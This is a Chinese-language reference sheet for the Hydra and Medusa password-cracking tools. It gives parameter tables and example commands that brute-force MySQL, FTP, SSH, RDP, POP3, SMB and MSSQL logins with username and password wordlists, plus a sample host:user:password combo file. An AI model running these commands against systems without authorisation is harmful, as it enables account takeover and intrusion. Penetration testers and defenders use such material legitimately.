Hydra
参数说明
参数 | 说明 |
---|---|
-R | 继续从上一次的进度开始破解 |
-S | 采用SSL链接 |
-s PORT | 如果非默认端口,可通过这个参数指定 |
-l LOGIN | 使用指定的用户名 |
-L FILE | 使用指定的用户名字典 |
-p PASS | 使用指定的密码破解 |
-P FILE | 使用指定的密码字典 |
-e ns | n:空密码试探,s:使用指定账户和密码试探 |
-C FILE | 使用冒号分割格式 例如:”登录名:密码”代替-L/-P参数 |
-M FILE | 指定目标列表文件 |
-o FILE | 指定结果输出文件 |
-f | 破解成功后立刻中止破解,如果只破解一个账户,可以使用此选项 |
-t TASKS | 设置运行的线程数,默认为16 |
-w TIME | 设置最大超时时间,单位为秒,默认是30s |
-v/-V | 显示详细过程 |
server | 目标IP |
service | 指定要破解的服务,Hydra目前支持的服务和协议有:telnet、ftp、ssh、rdp(远程桌面)、pop3、imap、smb、smbnt、mssql、mysql、pcanywhere、teamspeak sip等 |
Hydra使用实例
破解MySQL密码
hydra.exe -L c:\user.txt -P c:\pass.txt 192.168.1.110 mysql破解FTP密码
hydra.exe -l admin -P c:\pass.txt -t 5 192.168.1.110 ftp破解ssh
hydra.exe -L users.txt -P password.txt -e n -t 5 -vV 192.168.1.110 ssh破解rdp
hydra.exe -l administrator -P c:\pass.txt www.xxser.com rdp -V破解pop3
hydra.exe -l root -P pass.txt my.pop3.mail pop3
未指定文件路径时,Hydra将会在本目录下查找文件
Medusa
参数说明
参数 | 说明 |
---|---|
-h TEXT | 目标IP |
-H FILE | 目标主机文件 |
-u LOGIN | 用户名 |
-U FILE | 用户名文件 |
-p PASS | 密码 |
-P FILE | 密码文件 |
-C FILE | 组合条目文件 |
-O FILE | 输出文件 |
-e [n/s/ns] | N意为空密码,S意为密码与用户名相同 |
-M TEXT | 模块执行名称 |
-m TEXT | 传递参数到模块 |
-d | 显示所有的模块名称,非常实用 |
-n NUM | 使用非默认端口 |
-s | 启用SSL |
-r NUM | 重试间隔时间,默认3秒 |
-t NUM | 设置线程数量 |
-L | 并行化,每个用户使用一个线程 |
-f | 在任何主机上找到第一个账号/密码后,停止破解 |
-q | 显示模块的使用信息,非常实用 |
-v NUM | 详细级别0~6 |
-w NUM | 错误调试级别0~10 |
-V | 显示版本 |
-Z TEXT | 继续扫描上一次 |
Medusa使用实例
查看可以利用的模块
medusa -d显示指定模块的帮助信息
medusa -M 模块 -q破解smbnt
medusa -h www.secbug.org -u administrator -P /pass.txt -e ns -M smbnt破解MSSQL
medusa -h 192.168.1.110 -u sa -P /pass.txt -t 5 -f -M mssql使用“-C”参数破解smbnt
medusa -M smbnt -C combo.txt
combo.txt文件的格式如下:
192.168.0.20:administrator:password
192.168.0.20:testuser:pass
192.168.0.30:administrator:blah
192.168.0.40:user1:foopass
……
……破解SSH
medusa -M ssh -H host.txt -U users.txt -p password日志信息
medusa -h 192.168.1.11 -u sa -P /pass.txt -t 5 -f -e ns -M mssql -O /ap.txt